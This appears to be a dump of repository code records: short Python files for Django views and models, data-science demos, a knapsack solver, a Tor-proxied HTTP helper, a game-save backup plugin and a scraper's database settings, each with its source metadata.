# make sure the Dubaicash-Qt.app contains the right plist (including the right version)
# fix made because of several bugs in Qt mac deployment (https://bugreports.qt-project.org/browse/QTBUG-21267)
from string import Template
from datetime import date
bitcoinDir = "./";
inFile = bitcoinDir+"/share/qt/Info.plist"
outFile = "Dubaicash-Qt.app/Contents/Info.plist"
version = "unknown";
fileForGrabbingVersion = bitcoinDir+"bitcoin-qt.pro"
for line in open(fileForGrabbingVersion):
lineArr = line.replace(" ", "").split("=");
if lineArr[0].startswith("VERSION"):
version = lineArr[1].replace("\n", "");
fIn = open(inFile, "r")
fileContent = fIn.read()
s = Template(fileContent)
newFileContent = s.substitute(VERSION=version,YEAR=date.today().year)
fOut = open(outFile, "w");
fOut.write(newFileContent);
print "Info.plist fresh created"
|
[
"dubaicashdev@gmail.com"
] |
dubaicashdev@gmail.com
|
12686b41f48293ecb798c9a1ddd3b0cd93d17050
|
f8adcf8dd868fda7ba7098eb94e383c7d588bffb
|
/test/readme_example_generate.py
|
b3435a74ea47747f4da915274d866f3ee169057f
|
[
"MIT"
] |
permissive
|
bobyguo/frugally-deep
|
a847ad4fcb31d8d891ae6456d307a0e1e26e062f
|
20e2507e6055d1e64f4cf5a0a9a5a71bf3b3e97e
|
refs/heads/master
| 2020-03-08T08:26:21.410373
| 2018-04-09T09:24:02
| 2018-04-09T09:24:02
| 128,021,948
| 0
| 0
|
MIT
| 2018-04-04T07:08:09
| 2018-04-04T07:08:09
| null |
UTF-8
|
Python
| false
| false
| 542
|
py
|
#!/usr/bin/env python3
import numpy as np
from tensorflow.python.keras.layers import Input, Dense
from tensorflow.python.keras.models import Model
inputs = Input(shape=(4,))
x = Dense(5, activation='relu')(inputs)
predictions = Dense(3, activation='softmax')(x)
model = Model(inputs=inputs, outputs=predictions)
model.compile(loss='categorical_crossentropy', optimizer='nadam')
model.fit(
np.asarray([[1,2,3,4], [2,3,4,5]]),
np.asarray([[1,0,0], [0,0,1]]), epochs=10)
model.save('readme_example_model.h5', include_optimizer=False)
|
[
"editgym@gmail.com"
] |
editgym@gmail.com
|
6a61782fcfd4338c981fee4050af6ec266ed0558
|
86cdb209d9dd3dda040ca5469b68000a0d5c311a
|
/RobustIntegerKnapsackModel.py
|
086075eae4cb3fe0070696265153dd96db6164d7
|
[] |
no_license
|
ToledanoDiego/KnapsackProblem
|
40c9dd9d86036756e09cdc8a5006ede526378565
|
67ef1eb817eb65a180ba4b5c9fcb9a2694fba030
|
refs/heads/main
| 2023-08-19T03:48:13.440723
| 2021-10-04T14:55:37
| 2021-10-04T14:55:37
| 413,455,572
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,536
|
py
|
"""A Pyomo representation of the Robust Integer Knapsack Problem.
Run the Integer Knapsack Problem with instances found in Instances/
and write results into RobustIntegerKnapsackSolutions.txt.
Typical usage example:
python3 RobustIntegerKnapsackModel.py
"""
import random
import pyomo.environ as pyo
from pyomo.environ import *
import pyomo.kernel as pmo
import os
import warnings
import time
time_start = time.perf_counter()
warnings.filterwarnings("ignore", category=DeprecationWarning)
warnings.filterwarnings("ignore")
counter = 0
for filename in os.listdir('Instances'):
time_start = time.perf_counter()
file = open('Instances/' + filename, "r")
content = file.read()
data = content.splitlines()
index = []
profit = []
nominalWeight = []
robustWeight = []
solId = []
numberOfItems = int(data[0])
data.pop(0)
capacityOfKnapsack = int(data[-1])
data.pop(-1)
for item in data:
index.append(int(item.split()[0]) + 1)
profit.append(int(item.split()[1]))
nominalWeight.append(int(item.split()[2]))
robustWeight.append(int(item.split()[3]))
v = {index[i]: profit[i] for i in range(len(index))}
w = {index[i]: nominalWeight[i] for i in range(len(index))}
r = {index[i]: nominalWeight[i] + 10 / 100 * nominalWeight[i] for i in range(len(index))}
Gamma = int(10 / 100 * len(r))
tmp = random.sample(range(numberOfItems), Gamma)
tmp = [i + 1 for i in tmp]
for i in range(1, numberOfItems + 1):  # item indices are 1-based
    if i not in tmp:
        r[i] = 0
M = ConcreteModel() # Pyomo.
M.ITEMS = Set(initialize=v.keys())
M.x = Var(M.ITEMS, within=pmo.NonNegativeIntegers)
M.value = Objective(expr=sum(v[i] * M.x[i] for i in M.ITEMS), sense=maximize)
M.weight = Constraint(expr=sum((w[i] + r[i]) * M.x[i] for i in M.ITEMS) <= capacityOfKnapsack)
S = pyo.SolverFactory('cplex')
results = S.solve(M)
sol = 0
for i in M.component_objects(Var, active=True):
for index in i:
sol = sol + i[index].value * v[index]
if i[index].value > 0:
for j in range(int(i[index].value)):
solId.append(index)
time_elapsed = (time.perf_counter() - time_start)
f = open("RobustIntegerKnapsackSolutions.txt", "a")
f.write(str(filename) + '|' + str(sol) + '|' + str(time_elapsed) + '|' + str(solId) + '\n')
counter = counter + 1
print(counter)
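In compact form, each instance solves the following budgeted variant of the integer knapsack, restating the Pyomo model above (with S the random Γ-subset of deviating items built via `random.sample`):

```latex
\max \sum_{i=1}^{n} v_i x_i
\quad \text{s.t.} \quad \sum_{i=1}^{n} (w_i + r_i)\, x_i \le C, \qquad
r_i = \begin{cases} 1.1\, w_i & i \in S,\ |S| = \Gamma = \lfloor 0.1\, n \rfloor \\ 0 & \text{otherwise} \end{cases}, \qquad
x_i \in \mathbb{Z}_{\ge 0}
```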
|
[
"noreply@github.com"
] |
noreply@github.com
|
3a0f200b06d77ef08f908fd0474fe8e95f74cb21
|
b68fea9d645de59ee31da970d3dc435460fde9de
|
/discussboard/views_edit.py
|
a7cc8324343a334ab42398e43c09249b9d270868
|
[
"BSD-3-Clause"
] |
permissive
|
shagun30/djambala-2
|
03fde4d1a5b2a17fce1b44f63a489c30d0d9c028
|
06f14e3dd237d7ebf535c62172cfe238c3934f4d
|
refs/heads/master
| 2021-01-10T04:20:30.735479
| 2008-05-22T05:02:08
| 2008-05-22T05:02:08
| 54,959,603
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,026
|
py
|
# -*- coding: utf-8 -*-
"""
/dms/discussboard/views_edit.py
.. contains the view for changing the properties of the discussion board
Django content management system
Hans Rauch
hans.rauch@gmx.net
The programs of the dms system may be used freely and adapted to
specific needs.
0.02 21.05.2008 get_role_choices
0.01 12.07.2007 start of work
"""
from django.http import HttpResponse, HttpResponseRedirect
from django.shortcuts import render_to_response
from django import newforms as forms
from django.db import transaction
from django.utils.translation import ugettext as _
from dms.queries import get_site_url
from dms.roles import *
from dms.utils import get_tabbed_form
from dms.utils import info_slot_to_header
from dms.utils import get_parent_section_choices
from dms.utils import remove_link_icons
from dms.utils import get_choices_new_protected
from dms.utils_form import get_folderish_vars_edit
from dms.encode_decode import decode_html
from dms.discussboard.utils import get_dont
from dms.discussboard.help_form import help_form
from dms_ext.extension import * # override dms functions
# -----------------------------------------------------
@require_permission('perm_edit_folderish')
def discussboard_edit(request, item_container):
""" Eigenschaften des Ordners aendern """
params = request.GET.copy()
profi_mode = params.has_key('profi')
@transaction.commit_manually
def save_values(item_container, old, new):
""" Abspeichern der geaenderten Werte """
item_container.container.save_values(old, new)
item_container.item.save_values(old, new)
item_container.save_modified_values(old, new)
transaction.commit()
class dms_itemForm ( forms.Form ) :
title = forms.CharField(max_length=240,
widget=forms.TextInput(attrs={'size':60}) )
nav_title = forms.CharField(max_length=60,
widget=forms.TextInput(attrs={'size':30}) )
sub_title = forms.CharField(required=False, max_length=240,
widget=forms.TextInput(attrs={'size':60}) )
text = forms.CharField(required=False,
widget=forms.Textarea(attrs={'rows':5, 'cols':60, 'id':'ta',
'style':'width:100%;'}) )
text_more = forms.CharField(required=False,
widget=forms.Textarea(attrs={'rows':10, 'cols':60, 'id':'ta1',
'style':'width:100%;'}) )
image_url = forms.CharField(required=False, max_length=200,
widget=forms.TextInput(attrs={'size':60}) )
image_url_url = forms.URLField(required=False, max_length=200,
widget=forms.TextInput(attrs={'size':60}) )
image_extern = forms.BooleanField(required=False)
is_wide = forms.BooleanField(required=False)
is_important = forms.BooleanField(required=False)
if profi_mode:
info_slot_right= forms.CharField(required=False, widget=forms.Textarea(
attrs={'rows':10, 'cols':60, 'style':'width:100%;'}) )
else:
info_slot_right= forms.CharField(required=False, widget=forms.Textarea(
attrs={'rows':10, 'cols':60, 'id':'ta2', 'style':'width:100%;'}) )
section = forms.CharField(required=False,
widget=forms.Select(choices=get_parent_section_choices(item_container),
attrs={'size':4, 'style':'width:40%'} ) )
has_user_support = forms.BooleanField(required=False)
has_comments = forms.BooleanField(required=False)
is_moderated = forms.BooleanField(required=False)
is_browseable = forms.BooleanField(required=False)
visible_start = forms.DateField(input_formats=['%d.%m.%Y'],
widget=forms.TextInput(attrs={'size':10}))
visible_end = forms.DateField(input_formats=['%d.%m.%Y'],
widget=forms.TextInput(attrs={'size':10}))
show_next = forms.BooleanField(required=False)
integer_4 = forms.ChoiceField(choices=get_choices_new_protected(), widget=forms.RadioSelect() )
app_name = 'discussboard'
my_title = _(u'Diskussionsforum ändern')
data_init = {
'title' : decode_html(item_container.item.title),
'nav_title' : decode_html(item_container.container.nav_title),
'sub_title' : item_container.item.sub_title,
'text' : remove_link_icons(item_container.item.text),
'text_more' : remove_link_icons(item_container.item.text_more),
'image_url' : item_container.item.image_url,
'image_url_url' : item_container.item.image_url_url,
'image_extern' : item_container.item.image_extern,
'is_wide' : item_container.item.is_wide,
'is_important' : item_container.item.is_important,
'info_slot_right' : info_slot_to_header(item_container.item.info_slot_right),
'section' : decode_html(item_container.section),
'has_comments' : item_container.item.has_comments,
'has_user_support': item_container.item.has_user_support,
'is_moderated' : item_container.item.is_moderated,
'is_browseable' : item_container.is_browseable,
'visible_start' : item_container.visible_start,
'visible_end' : item_container.visible_end,
'integer_4' : item_container.item.integer_4
}
if request.method == 'POST' :
data = request.POST.copy ()
else :
data = data_init
f = dms_itemForm ( data )
# --- order, headings, help texts // special case: start page
tabs = [
('tab_base' , ['title', 'sub_title', 'nav_title', 'section', ]),
('tab_intro' , ['text', 'text_more', 'image_url', 'image_url_url', 'image_extern',
'is_wide', 'is_important']),
('tab_user_support', ['has_user_support', 'integer_4', 'is_moderated', 'has_comments']),
('tab_frame' , ['info_slot_right',]),
('tab_visibility', ['is_browseable', 'visible_start', 'visible_end',]),
]
content = get_tabbed_form(tabs, help_form, app_name ,f)
if request.method == 'POST' and not f.errors :
save_values(item_container, data_init, f.data)
return HttpResponseRedirect(get_site_url(item_container, 'index.html'))
else :
vars = get_folderish_vars_edit(request, item_container, app_name, my_title, content, f, get_dont())
return render_to_response ( 'app/base_edit.html', vars )
|
[
"hans.rauch@gmx.net"
] |
hans.rauch@gmx.net
|
b34142bcca93eb06ac562fb0d801305f7e0c5f00
|
dd4ccdb4ba014abad82270a428a2819d7ccb82f6
|
/statuses/__init__.py
|
73d87732bf2d073aff0ce0cfa4abf2c271015977
|
[] |
no_license
|
Takinado/rbu
|
3c122eeb0262a38fb6ee459022d0135e839b56ca
|
99f55085fd664657cee05631c426362e877e1439
|
refs/heads/master
| 2020-03-07T14:09:11.966479
| 2018-03-31T09:39:42
| 2018-03-31T09:39:42
| 127,519,823
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 53
|
py
|
default_app_config = "statuses.apps.StatusAppConfig"
|
[
"takinado@mail.ru"
] |
takinado@mail.ru
|
deb4be375223c47ca23cf76acf8592ff12a33e4b
|
6430d2572c4d6dfe41e0e30e725271444cc6f675
|
/torsurvey/torapi.py
|
6a8d9874f0eeda2ccf1457658601340cd0f124c6
|
[] |
no_license
|
nikcub/torsurvey
|
5a0c36560801862d5cf1c74f362ae013e0458f27
|
6e9ce5793694857dd5c451905a4a7aa773bfd2b6
|
refs/heads/master
| 2016-09-05T10:47:13.578465
| 2015-01-27T15:37:07
| 2015-01-27T15:37:07
| 26,388,609
| 1
| 1
| null | 2015-01-27T15:37:07
| 2014-11-09T07:18:27
|
Python
|
UTF-8
|
Python
| false
| false
| 1,580
|
py
|
#!/usr/bin/env python
"""
torsurvey.torapi
"""
import requesocks as requests
import requesocks.exceptions
# import hmac
# import hashlib
# import json
import logging
# from time import time
class TorAPI(object):
headers = {
'User-Agent' : 'torsurvey-',
}
tor_host = None
tor_port = None
proxy_tor = {
"http": "socks5://127.0.0.1:9030",
"https": "socks5://127.0.0.1:9030"
}
def __init__(self, proxy_host='127.0.0.1', proxy_port='9040', proxy_type='socks5', timeout=10):
self.proxy_host = proxy_host
self.proxy_port = proxy_port
self.proxy_type = proxy_type
self.timeout = timeout
self.proxy = {}
self.proxy['http'] = "%s://%s:%d" % (proxy_type, proxy_host, int(proxy_port))
self.proxy['https'] = "%s://%s:%d" % (proxy_type, proxy_host, int(proxy_port))
self.session = requesocks.session()
self.session.proxies = self.proxy
logging.debug("Established session with proxies %s" % str(self.proxy))
def get_ip(self):
r = self.req('http://ifconfig.me/ip')
if r.status_code == 200:
return r.text
return 'Error'
def get_headers(self):
headers = self.headers
# @TODO add headers
return headers
def req(self, url, extras={}):
try:
r = self.session.request('GET', url, allow_redirects=True, timeout=self.timeout, headers=self.headers)
return r
except requesocks.exceptions.ConnectionError, e:
logging.error("Bad connection cannot connect to %s" % url)
return -1
except Exception, e:
logging.error("%s: %s" % (url, e))
return -1
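A minimal usage sketch, assuming a Tor SOCKS proxy is listening locally (9050 is Tor's stock default, while the class itself defaults to 9040):

```python
api = TorAPI(proxy_port='9050')
print(api.get_ip())  # exit node IP as text, or 'Error' on a non-200 response
```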
|
[
"nikcub@gmail.com"
] |
nikcub@gmail.com
|
99cc6f137b9f513dd32357037e6f41e2231fad35
|
920b9cb23d3883dcc93b1682adfee83099fee826
|
/itsm/project/models/base.py
|
747edf57e059aed9c831fc4991b3f24c7f758c0a
|
[
"MIT",
"LGPL-2.1-or-later",
"LGPL-3.0-only"
] |
permissive
|
TencentBlueKing/bk-itsm
|
f817fb166248d3059857b57d03e8b5ec1b78ff5b
|
2d708bd0d869d391456e0fb8d644af3b9f031acf
|
refs/heads/master
| 2023-08-31T23:42:32.275836
| 2023-08-22T08:17:54
| 2023-08-22T08:17:54
| 391,839,825
| 100
| 86
|
MIT
| 2023-09-14T08:24:54
| 2021-08-02T06:35:16
|
Python
|
UTF-8
|
Python
| false
| false
| 2,045
|
py
|
# -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making BK-ITSM 蓝鲸流程服务 available.
Copyright (C) 2021 THL A29 Limited, a Tencent company. All rights reserved.
BK-ITSM 蓝鲸流程服务 is licensed under the MIT License.
License for BK-ITSM 蓝鲸流程服务:
--------------------------------------------------------------------
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial
portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT
LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN
NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
from django.db import models
from django.utils.translation import ugettext as _
from itsm.component.constants import LEN_NORMAL
class Model(models.Model):
FIELDS = ('creator', 'create_at', 'updated_by', 'update_at')
creator = models.CharField(_("创建人"), max_length=LEN_NORMAL, null=True, blank=True)
create_at = models.DateTimeField(_("创建时间"), auto_now_add=True)
update_at = models.DateTimeField(_("更新时间"), auto_now=True)
updated_by = models.CharField(_("修改人"), max_length=LEN_NORMAL, null=True, blank=True)
class Meta:
app_label = 'project'
abstract = True
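A hypothetical concrete model inheriting the abstract base above (the `Ticket` name and its field are illustrative only):

```python
class Ticket(Model):
    title = models.CharField(_("title"), max_length=LEN_NORMAL)

    class Meta:
        app_label = 'project'
```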
|
[
"1758504262@qq.com"
] |
1758504262@qq.com
|
74044ba31aee8febadeb0b5bdf8ad33d30405070
|
575bdfbcc1eef8a0c38b60292dc992aa3e9dab90
|
/2_Regression/Simple_Linear_Regression.py
|
11da5c04873b45adc42f921c7dfcf874c0f31693
|
[] |
no_license
|
saimahesh-geek/machine-learning
|
36ffce0cd08f4046e52f28ca8b0e9329d6346239
|
ca5ccea924c5cce9ae8046b139d80b4a661accdb
|
refs/heads/master
| 2020-04-05T22:21:31.637849
| 2018-11-19T09:44:04
| 2018-11-19T09:44:04
| 157,253,574
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,236
|
py
|
#Importing libraries
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
#Importing datasets
dataset = pd.read_csv('Salary_Data.csv')
X = dataset.iloc[:, :-1].values
y = dataset.iloc[:, -1].values
#Splitting the dataset into training and test sets
#cross_validation - deprecated
from sklearn.model_selection import train_test_split
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 1/3, random_state = 0)
#Fitting Simple Linear Regression to the training set
from sklearn.linear_model import LinearRegression
regressor = LinearRegression()
regressor.fit(X_train, y_train)
#Predicting the test set results
y_pred = regressor.predict(X_test)
#Visualising the training set results
plt.scatter(X_train, y_train, color = 'red')
plt.plot(X_train, regressor.predict(X_train), color='blue')
plt.title('Salary VS Experience (Training Set)')
plt.xlabel('Years of experience')
plt.ylabel('Salary')
plt.show()
#Visualising the test set results
plt.scatter(X_test, y_test, color = 'red')
plt.scatter(X_test, y_pred, color = 'yellow')
plt.plot(X_train, regressor.predict(X_train), color='blue')
plt.title('Salary VS Experience (Test Set)')
plt.xlabel('Years of experience')
plt.ylabel('Salary')
plt.show()
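A natural follow-up, not in the original script, is to quantify the fit on the held-out set with scikit-learn's standard regression metrics:

```python
from sklearn.metrics import mean_squared_error, r2_score

print('Test R^2:', r2_score(y_test, y_pred))
print('Test MSE:', mean_squared_error(y_test, y_pred))
```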
|
[
"saimahesh.cse@gmail.com"
] |
saimahesh.cse@gmail.com
|
052c5c207307bbe9f26b006dfb64a5119f43a3fe
|
d1a7899f6d7e791a9886a7b32d573263a45713ad
|
/apps/staff/views.py
|
b7252543cbc5066672071587c46e942b2ae99d20
|
[] |
no_license
|
ranjitreonard/hospital_project
|
bac01437cb5ad6c4a18cfe78f8912f9210df2c18
|
10cdcac28d2c7add2c0878d80bfb90c91a2d5c2f
|
refs/heads/main
| 2023-01-11T04:16:27.817128
| 2020-11-12T17:56:39
| 2020-11-12T17:56:39
| 303,461,061
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,445
|
py
|
from django.contrib.auth.decorators import login_required
from django.contrib.auth.mixins import LoginRequiredMixin
from django.http import HttpResponseRedirect
from django.shortcuts import render, redirect
from django.urls import reverse_lazy
from django.utils import timezone
from django.views.generic import CreateView
from apps.management.forms import LeavePeriodForm
from apps.management.models import Complaint
from apps.staff.models import Leave
@login_required()
def dashboard(request):
return render(request=request, template_name='staff/dashboard.html')
@login_required()
def add_complaint(request):
complaints = request.POST.get('complaints')
all_complaints = Complaint.objects.all()
context = {
'all_complaints': all_complaints
}
if request.method == 'POST':
my_complaint = Complaint.objects.create(
complaint=complaints,
created_by=request.user,
status='Pending',
# created_at=timezone.now(),
)
# complaints.complaint.add(my_complaint)
my_complaint.save()
return render(request, 'staff/complaint.html', context=context)
def cancel_complaint(request, id):
complaint = Complaint.objects.get(id=id)
if complaint.status == 'Pending':
complaint.status = 'Canceled'
complaint.save()
return redirect(reverse_lazy('staff:add-complaint'))
|
[
"ranjitreonard@gmail.com"
] |
ranjitreonard@gmail.com
|
b1ab51beb86bb85dddf16a4de946d7f4359aa706
|
db24cc07c4bcc000c3643e13bfb55e08c255548f
|
/plugins/Metro_2033.py
|
d055d6da6a762a512c8a30ccfbc110f23335cb13
|
[
"MIT"
] |
permissive
|
Pr0Ger/SGSB
|
40db6b7b02557956a535e6afb26b62b218158162
|
6adf8dc7ce3bf3d4b84f46b7d97aad376440e175
|
refs/heads/master
| 2021-01-21T04:54:00.149185
| 2016-05-03T10:40:07
| 2016-05-03T10:40:07
| 9,470,033
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 764
|
py
|
import os
from lib.base_plugin import BasePlugin
from lib.paths import MyDocumentsPath, SteamGamesPath, SteamCloudPath
class Metro2033Plugin(BasePlugin):
Name = "Metro 2033"
support_os = ["Windows"]
def backup(self, _):
_.add_folder('Saves', os.path.join(MyDocumentsPath, '4a games'), 'metro 2033')
_.add_files('Config', os.path.join(SteamCloudPath, '43110', 'remote'), 'user.cfg')
def restore(self, _):
_.restore_folder('Saves', os.path.join(MyDocumentsPath, '4a games'), 'metro 2033')
_.restore_files('Config', os.path.join(SteamCloudPath, '43110', 'remote'), 'user.cfg')
def detect(self):
if os.path.isdir(os.path.join(SteamGamesPath, 'metro 2033')):
return True
return False
|
[
"git@pr0ger.org"
] |
git@pr0ger.org
|
91ada6f45a09b8402b1495832eadc2d12fdfc6e7
|
196d79948210027c00405788fe913fec58e304fb
|
/Correlated_normal_random_numbers.py
|
4cb1a324de31d1c1eda2b46897e5bd88e0e7e72a
|
[] |
no_license
|
Mazumsad/Python-Programs
|
b5f4bcfb58c4c557d63f7e9dc11519a2f23c91ed
|
8698f1b373493f330b6aa971534abaa2d8464732
|
refs/heads/main
| 2023-07-02T22:36:39.300498
| 2021-08-09T09:13:16
| 2021-08-09T09:13:16
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,458
|
py
|
# Correlated normal random numbers
#
# Author: Oscar A. Nieves
# Last updated: July 01, 2021
import matplotlib.pyplot as plt
import numpy as np
plt.close('all')
np.random.seed(0) # Set seed
# Inputs
samples = 1000
# Random samples (Uniformly distributed)
U1 = np.random.rand(samples,1)
U2 = np.random.rand(samples,1)
# Random samples (normally distributed uncorrelated)
S1 = np.sqrt(-2*np.log(U1))*np.cos(2*np.pi*U2)
S2 = np.sqrt(-2*np.log(U1))*np.sin(2*np.pi*U2)
E_S1 = np.mean(S1)
Var_S1 = np.mean(S1**2) - E_S1**2
sigma_S1 = np.sqrt(Var_S1)
E_S2 = np.mean(S2)
Var_S2 = np.mean(S2**2) - E_S2**2
sigma_S2 = np.sqrt(Var_S2)
Cov_S1_S2 = np.mean(S1*S2) - E_S1*E_S2
Corr_S1_S2 = Cov_S1_S2/sigma_S1/sigma_S2
print('corr(S1,S2) = ' + str(Corr_S1_S2))
# Correlated random samples
mu_x = 0.5
mu_y = 0.66
sigma_x = 0.85
sigma_y = 1.24
rho = 0.5
X = mu_x + sigma_x * S1
Y = mu_y + sigma_y * (rho*S1 + np.sqrt(1-rho**2)*S2)
E_X = np.mean(X)
Var_X = np.mean(X**2) - E_X**2
sigma_X = np.sqrt(Var_X)
E_Y = np.mean(Y)
Var_Y = np.mean(Y**2) - E_Y**2
sigma_Y = np.sqrt(Var_Y)
Cov_X_Y = np.mean(X*Y) - E_X*E_Y
Corr_X_Y = Cov_X_Y/sigma_X/sigma_Y
print('corr(X,Y) = ' + str(Corr_X_Y))
# Generate plots
plt.subplot(1,2,1)
plt.plot(S1,S2,linestyle="",marker="o",color="blue")
plt.xlabel('S1', fontsize=16)
plt.ylabel('S2', fontsize=16)
plt.subplot(1,2,2)
plt.plot(X,Y,linestyle="",marker="o",color="green")
plt.xlabel('X', fontsize=16)
plt.ylabel('Y', fontsize=16)
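By construction, corr(X, Y) converges to rho = 0.5 as the sample count grows; a one-line cross-check with NumPy (not in the original script):

```python
# Should agree with the hand-computed Corr_X_Y above, i.e. roughly 0.5.
print(np.corrcoef(X.flatten(), Y.flatten())[0, 1])
```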
|
[
"noreply@github.com"
] |
noreply@github.com
|
1fe65d81b9ace7330b0e75a717eac734837ec34a
|
c3a16bebf2d2df1cef785ab8821d1e55a2c7781a
|
/LagouSpider-master/Config/settings.py
|
182e9ab46b1a73a4b0be0d41b346ac66c65a827b
|
[] |
no_license
|
lailaizhou/Python-
|
b1459b18fb1717e9db0dd06bf85d9e4beb1f4b4d
|
44092c899b73a8fcab4eb54b524a01ecd6369412
|
refs/heads/master
| 2023-02-12T08:23:26.079521
| 2021-01-10T07:54:01
| 2021-01-10T07:54:01
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,075
|
py
|
import pymysql
import redis
from pymysql.err import Warning
'''
1. Specify the database name, table name and whether to deduplicate (the database and table are created automatically if they do not exist)
2. Configure the MySQL and Redis connections in __init__; defaults are the local server, user root, password 123456
'''
class Settings(object):
DATABASE_NAME = 'test' # database name
TABLE_NAME = 'it' # table name
DONT_FILTER = False # whether to filter URLs that were already crawled; False (default) filters, True does not
SHOW_WINDOWS = False
SPEED = 1
executable_path = r'C:\Program Files (x86)\Google\Chrome\Application\chromedriver.exe'  # raw string avoids invalid escape sequences
START = True
def __init__(self):
if self.START:
# MySQL database used to store the scraped data
self.mysql_conn = pymysql.Connection(
host='localhost',
port=3306,
user='root',
password='123456',
database=None,
charset='utf8',
)
# create the database and table
self.create_db_and_table()
self.mysql_conn.select_db(self.DATABASE_NAME)
# deduplication store
# connect to local Redis database 1 (defaults to 0 if omitted)
self.redis_db = redis.StrictRedis(host='127.0.0.1', port=6379, db=1)
self.START = False
def create_db_and_table(self):
cs = self.mysql_conn.cursor()
create_db_sql = f'create database IF NOT EXISTS {self.DATABASE_NAME};'
user_db = f'use {self.DATABASE_NAME};'
create_table_sql = f'''create table IF NOT EXISTS {self.TABLE_NAME}(
id int primary key auto_increment,
# search info
keywords varchar(20), # job search keyword
detail_url varchar(100), # URL of the job detail page
# job-related info
position varchar(40), # job title (e.g. Python developer, Python intern)
tags varchar(50), # job tags (e.g. e-commerce|backend|big data|data mining|machine learning|HTML|CSS|Python)
salary varchar(10), # salary range (e.g. 7K-10K, 10K-20K)
job_type varchar(10), # employment type (e.g. full-time, internship, part-time)
city varchar(10), # work location (e.g. Beijing-Haidian, Zhejiang-Hangzhou)
district varchar(10), # work district
street varchar(40), # street address
education varchar(10), # education requirement (e.g. junior high or below, high school/technical/vocational, associate, bachelor, master, doctorate, none)
work_experience varchar(10), # work experience (e.g. student/fresh graduate, 1-3 years, 3-5 years, none)
release_date varchar(12), # posting date (e.g. 2020-1-20)
description varchar(2000), # job description
# company-related info
company_name varchar(40), # name of the hiring company
company_scale varchar(20), # company size (e.g. fewer than 15, 15-50)
company_field varchar(20), # company sector (e.g. internet, finance, e-commerce)
company_type varchar(10), # company type (e.g. private, listed, series C, not funded)
company_benefits varchar(100) # company benefits (e.g. industry leader, strong tech culture, performance bonus; insurance and housing fund, company trips, professional training, year-end bonus, flexible hours, regular health checks)
);'''
try:
cs.execute(create_db_sql)
except Warning:
print(f"{self.DATABASE_NAME} 数据库已经存在========")
cs.execute(user_db)
try:
cs.execute(create_table_sql)
except Warning:
print(f"{self.TABLE_NAME} 表已经存在========")
self.mysql_conn.commit()
# print(create_table_sql)
def get_mysql_connect(self):
return self.mysql_conn
def get_redis_connect(self):
return self.redis_db
def db_exists(self, cursor, db_name):
pass
def tabel_exists(self, cursor, table_name):
pass
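A usage sketch, assuming MySQL and Redis servers are running locally with the credentials hard-coded above:

```python
settings = Settings()
db = settings.get_mysql_connect()     # pymysql connection; DB and table exist now
dedup = settings.get_redis_connect()  # redis.StrictRedis on logical db 1
```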
|
[
"jixingjiukeyile@163.com"
] |
jixingjiukeyile@163.com
|
4f9cf6f9574426479a9b31ac6a3141432a6b3254
|
57aa5d223e03cd4776b24fd5abddebd5e088b8f6
|
/djapi/deploy/migrations/0009_auto_20180525_1612.py
|
dee8ba7607a5ce4dad41782314cbc75cb8432f9e
|
[] |
no_license
|
uahoo/hasan
|
5308e231fa531431029d0ed07693128c76324fa1
|
b6ad10103ee09ab9de3b29c9bb20a98a56585206
|
refs/heads/master
| 2020-06-30T07:37:56.698144
| 2018-06-05T09:53:16
| 2018-06-05T09:53:16
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 894
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.5 on 2018-05-25 08:12
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('deploy', '0008_auto_20180424_1627'),
]
operations = [
migrations.RemoveField(
model_name='deployinfo',
name='deploy_ip',
),
migrations.AddField(
model_name='deployinfo',
name='desc',
field=models.CharField(max_length=124, null=True),
),
migrations.AddField(
model_name='deployinfo',
name='host',
field=models.CharField(max_length=125, null=True),
),
migrations.AddField(
model_name='deployinfo',
name='status',
field=models.BooleanField(default=False),
),
]
|
[
"xiaofangliu2012@126.com"
] |
xiaofangliu2012@126.com
|
e5f464aed684607088c0c6db4c09487c67a66592
|
13661160ec486aff1f3a6c56ddf397b665397d9d
|
/babu/indexing.py
|
da49ecd461403780562e36155acdd50290ddf7fe
|
[] |
no_license
|
xaviermathew/Babu
|
3ed0464cd90276b471d5c7326d07b475d5f8803b
|
e953c3c2e80309918d0159fd93216bd3a4012ad2
|
refs/heads/master
| 2021-06-08T20:25:25.735180
| 2016-10-31T20:50:02
| 2016-10-31T20:50:02
| 72,604,027
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,016
|
py
|
import ctypes
import string
CHARSET = string.ascii_letters + string.digits
class DataPointerArray(ctypes.Array):
_length_ = 10
_type_ = ctypes.c_int
class IndexPointerArray(ctypes.Array):
_length_ = len(CHARSET)
_type_ = ctypes.c_int
class Page(ctypes.Structure):
_fields_ = [
('curr', ctypes.c_char),
('data_ptrs', DataPointerArray),
('index_ptrs', IndexPointerArray),
